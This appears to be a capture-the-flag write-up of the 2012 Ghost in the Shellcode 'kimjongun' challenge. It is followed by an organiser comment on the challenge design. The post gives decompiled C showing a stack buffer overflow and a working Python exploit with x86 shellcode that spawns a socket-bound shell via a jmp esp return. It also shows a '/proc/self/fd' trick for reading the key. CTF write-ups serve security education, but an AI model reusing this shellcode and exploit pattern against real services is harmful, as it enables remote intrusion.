File was running at kimjongun.final2012.ghostintheshellcode.com : 2645
Summary: buffer overflow, reverse
File is a x86 ELF. First of all, it asks a password, but password could be anything except “HansBrix!!!”
And it has to be 0xc length.
Then, it is a usual buffer overflow task for warming up
The main function has a buffer overflow.
signed int __cdecl check_func()
{
int flag; // edx@1
signed int result; // eax@1
char buffer[512]; // [sp+10h] [bp-208h]@1
memset(buffer, 0, sizeof(buffer));
SendToUser(fd, “Password: “);
ReadFromUser(fd, buffer, 0xCu, 10);
flag = strncmp(buffer, s2, 0xCu);
result = 1;
if ( flag )
{
SendToUser(fd, “Welcome shitty wok, may a taka oda prez?\n”);
ReadFromUser(fd, buffer, 0x240u, 0xAu);
SendToUser(fd, “Goddamn Mongorians! Quit breakin down my shitty wall!!!\n”);
result = 0;
}
return result;
}
And that is the exploit.
from socket import create_connection import sys import re import time if __name__ == "__main__": sock = create_connection(('kimjongun.final2012.ghostintheshellcode.com', 2645)) print sock.recv(1024) fake = sys.stdin.readline() sock.send("HansBrix!!!\n") print sock.recv(1024) #0xbfe86d0c - ret addr payload = "\x6A\x05\x5F\x89\xfb\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8\x6a" payload += "\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e" payload += "\x89\xe3\x52\x53\x89\xe1\xcd\x80" #08048853 - jmp esp ret2 = '\x53\x88\x04\x08' buff = b'\x90'*(0x1fc-len(payload)) + payload + b'\x90'*0x10 + ret2 + payload + b'\x0a' sock.send(buff) buff = b'ls -la' + b'\x0a' sock.send(buff) print sock.recv(1024) |
But when you take shell it is a problem to find a key. Instead of key I found that photo of pretty guy from PPP :)
If you need a real key, you have to see a handle of open key file. Something like that =)
cat /proc/self/fd/4
Bingo!
1 comment
In hindsight, we should have had it chrooted w/o proc and we should not have had the “new” key overlay mounted over the old one. That confused too many people. You did correctly find the open handle which was exactly the point, but the intention was to have folks write shellcode to use the parent’s FD and read the key that way.
In hindsight, we think we should have just had the binary run as root, open the file (only readable by root), drop-privs, then listen on the socket (also chroot so no /proc).
That would have forced people to achieve what we were hoping for and made it less of an easter-egg hunt as to what the goal was.
One bit of trivia: this was a hat-tip to the original kimjongd binary from Defcon Finals in 2007. It’s also got a sneaky reference in the IDA Pro book by Chris Eagle.